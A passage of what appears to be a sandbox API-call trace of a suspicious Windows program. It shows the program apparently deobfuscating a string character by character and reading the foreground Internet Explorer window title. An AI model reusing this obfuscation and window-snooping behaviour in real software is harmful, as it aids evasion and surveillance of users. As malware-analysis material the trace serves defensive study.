pvarResult=0x28f190) returned 0x0 [0177.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.719] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0177.720] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.720] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0177.721] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.722] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0177.722] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.723] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0177.723] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.723] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0177.724] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.724] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0177.725] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.725] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0177.726] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.726] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0177.727] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.727] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0177.727] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.728] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0177.728] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.729] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.729] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.730] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.730] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.731] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0177.732] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.732] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.732] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.733] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.733] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.734] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0177.734] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.734] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.735] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.735] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.736] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.736] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0177.737] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.737] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.737] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.738] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0177.738] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.739] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0177.739] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.740] GetForegroundWindow () returned 0x10162 [0177.767] GetLastError () returned 0x0 [0177.767] SysStringLen (param_1=" ") returned 0xff [0177.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0177.767] SysStringLen (param_1=" ") returned 0xff [0177.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0177.768] GetWindowTextA (in: hWnd=0x10162, lpString=0x11644c4, nMaxCount=255 | out: lpString="Blank Page - Windows Internet Explorer") returned 38 [0177.772] GetLastError () returned 0x0 [0177.772] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0177.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0177.773] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0177.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 256 [0177.773] SysStringLen (param_1="Blank Page - Windows Internet Explorer") returned 0x27 [0177.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Blank Page - Windows Internet Explorer", cchWideChar=40, lpMultiByteStr=0x1168d8c, cbMultiByte=79, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Blank Page - Windows Internet Explorer", lpUsedDefaultChar=0x0) returned 40 [0177.773] SetWindowTextA (hWnd=0x103c4, lpString="Blank Page - Windows Internet Explorer") returned 1 [0177.774] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0177.774] GetFocus () returned 0x0 [0177.775] lstrlenA (lpString="Blank Page - Windows Internet Explorer") returned 38 [0177.775] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1168d8c) returned 0x1 [0177.782] IsWindow (hWnd=0x103c4) returned 1 [0177.782] IsWindow (hWnd=0x103c4) returned 1 [0177.782] IsWindow (hWnd=0x103c4) returned 1 [0177.782] IsWindow (hWnd=0x103c4) returned 1 [0177.783] GetFocus () returned 0x0 [0177.784] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x26 [0177.785] GetFocus () returned 0x0 [0177.787] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x27) returned 0x10ebcd0 [0177.787] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x27, lParam=0x10ebcd0) returned 0x26 [0177.787] GetFocus () returned 0x0 [0177.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0177.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=-1, lpWideCharStr=0x1168d8c, cchWideChar=39 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 39 [0177.791] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0177.791] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0177.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.792] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0177.792] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.793] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0177.793] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.794] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0177.794] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.795] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0177.795] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.796] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0177.797] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.797] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0177.797] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.798] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0177.798] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.799] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0177.799] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.800] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0177.800] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) 